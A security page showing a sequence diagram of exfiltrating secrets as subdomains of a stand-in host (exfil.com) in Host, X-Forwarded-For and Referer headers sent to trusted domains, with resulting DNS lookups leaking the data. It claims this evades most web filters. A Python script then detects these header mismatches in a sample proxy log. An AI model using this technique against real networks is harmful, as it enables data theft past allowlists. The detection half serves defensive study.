Web Headers (HLD)
This Mermaid diagram visualizes the journey of carefully positioned exfiltration data on its way to an informed listener. The headers shown are examples: we have found the Host header to be the most popular, but others work and you should look for them; these are the top few.
sequenceDiagram
    participant Client as Exfil System
    participant WebServer as Trusted Webservers
    participant DNS as DNS Server - Exfil Collect
    Client->>WebServer: HTTP Requests to high-integrity domains
    Note left of WebServer: Headers: Host: secretmessage1.exfil.com
    Note left of WebServer: Headers: X-Forwarded-For: secretmessage2.exfil.com
    Note left of WebServer: Headers: Referer: secretmessage3.exfil.com
    Note right of WebServer: Incoming HTTP requests delivered to trusted webserver, containing sensitive exfiltrated data in headers
    Note right of WebServer: Headers: Host: secretmessage1.exfil.com
    Note right of WebServer: Headers: X-Forwarded-For: secretmessage2.exfil.com
    Note right of WebServer: Headers: Referer: secretmessage3.exfil.com
    WebServer-->>Client: HTTP Response
    Note right of WebServer: Confirms receipt of HTTP request with sensitive data in the headers
    alt Hostname Lookup Solicitation
        WebServer->>DNS: Lookup secretmessage1.exfil.com
        Note right of DNS: Exfiltration Data Received (Hostname: secretmessage1.exfil.com)
        DNS-->>WebServer: IP for secretmessage1.exfil.com
        Note right of WebServer: Received IP address corresponding to secretmessage1.exfil.com
        WebServer->>DNS: Lookup secretmessage2.exfil.com
        Note right of DNS: Exfiltration Data Received (Hostname: secretmessage2.exfil.com)
        DNS-->>WebServer: IP for secretmessage2.exfil.com
        Note right of WebServer: Received IP address corresponding to secretmessage2.exfil.com
        WebServer->>DNS: Lookup secretmessage3.exfil.com
        Note right of DNS: Exfiltration Data Received (Hostname: secretmessage3.exfil.com)
        DNS-->>WebServer: IP for secretmessage3.exfil.com
        Note right of WebServer: Received IP address corresponding to secretmessage3.exfil.com
    end
    WebServer-->>Client: DNS Resolution Complete
    Note right of WebServer: Web server returns the final HTTP response to the client, confirming successful hostname lookups
So, if you imagine the high-integrity domains being something like Microsoft, your defense provider, an analytics service, or even just an associated domain that has been seen in your DNS TXT records or is a known service provider to your organization, this is more than enough to pass most web-filtering systems and allowlists.
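The diagram and the paragraph above both turn on the same weakness: an allowlist that looks only at the destination server and never at what the request headers say. The DNS lookups in the diagram happen on the trusted web server's side, so the organization that owns the exfil system never sees them; the only place it can observe the technique is its own egress proxy log, where the Host, X-Forwarded-For and Referer values are visible next to the destination they were sent to. The following detection script is an added example written for this page, not code from the original author. It assumes a simple constructed proxy log format (destination|Host|X-Forwarded-For|Referer) and a hypothetical per-destination allowlist, and flags the three header mismatches the diagram relies on: a Host header that names a site the destination does not serve, a hostname where X-Forwarded-For should only ever carry IP addresses, and a Referer whose origin is unknown.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample egress-proxy log (not from any real system).
# Field order: destination server | Host header | X-Forwarded-For | Referer
SAMPLE_LOG = """\
www.microsoft.com|www.microsoft.com|-|https://www.microsoft.com/en-us/
www.microsoft.com|secretmessage1.exfil.com|-|-
analytics.example-vendor.com|analytics.example-vendor.com|secretmessage2.exfil.com|-
analytics.example-vendor.com|analytics.example-vendor.com|203.0.113.7|https://secretmessage3.exfil.com/x
cdn.example-vendor.com|cdn.example-vendor.com|10.0.0.5, 198.51.100.2|https://cdn.example-vendor.com/a.js
"""

# Hypothetical allowlist: for each destination server, the hostnames that
# legitimately appear in Host/Referer when talking to it. Any real deployment
# would build this from its own proxy allowlist and vendor inventory.
ALLOWLIST = {
    "www.microsoft.com": {"www.microsoft.com"},
    "analytics.example-vendor.com": {"analytics.example-vendor.com"},
    "cdn.example-vendor.com": {"cdn.example-vendor.com", "www.example-vendor.com"},
}
# Every hostname we recognise at all, used for the (noisier) Referer check.
KNOWN_ORIGINS = set().union(*ALLOWLIST.values())


def _is_ip(value):
    """True if value parses as an IPv4/IPv6 address (X-Forwarded-For entries must)."""
    try:
        ipaddress.ip_address(value.strip())
        return True
    except ValueError:
        return False


def _referer_host(referer):
    """Extract the hostname from a Referer URL; '-' means the header was absent."""
    if referer in ("-", ""):
        return None
    return urlsplit(referer).hostname


def check_line(line):
    """Return a list of (header, value, reason) findings for one log line."""
    dest, host, xff, referer = line.split("|")
    findings = []
    allowed_for_dest = ALLOWLIST.get(dest, {dest})

    # 1. The Host header must name a site this destination actually serves.
    #    A mismatch is the Host-based channel in the diagram.
    if host.lower() not in allowed_for_dest:
        findings.append(("Host", host, "Host does not match destination server"))

    # 2. X-Forwarded-For is a comma-separated list of IP addresses; a hostname
    #    in it has no legitimate meaning and is the second channel in the diagram.
    if xff != "-":
        for part in xff.split(","):
            if not _is_ip(part):
                findings.append(("X-Forwarded-For", part.strip(), "non-IP value"))

    # 3. The Referer origin should be something the organization recognises.
    rhost = _referer_host(referer)
    if rhost and rhost.lower() not in KNOWN_ORIGINS:
        findings.append(("Referer", rhost, "Referer origin is not a known site"))
    return findings


def scan(log_text):
    """Map 1-based line number -> findings, for every log line that produced any."""
    results = {}
    for lineno, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        findings = check_line(line)
        if findings:
            results[lineno] = findings
    return results


if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        for header, value, reason in findings:
            print(f"line {lineno}: {header}={value!r}: {reason}")
```

The Host check is the strong signal: a proxy that sees the TLS SNI or the CONNECT target can compare it against the Host header with almost no false positives, and on the sample log it fires only on line 2. The X-Forwarded-For check is equally cheap because the header has a fixed syntax. The Referer check is the noisy one, since legitimate cross-site navigation produces unknown origins all day; score it rather than alert on it, and treat a Referer whose hostname shares a registered domain with a flagged Host value as the strongest corroboration.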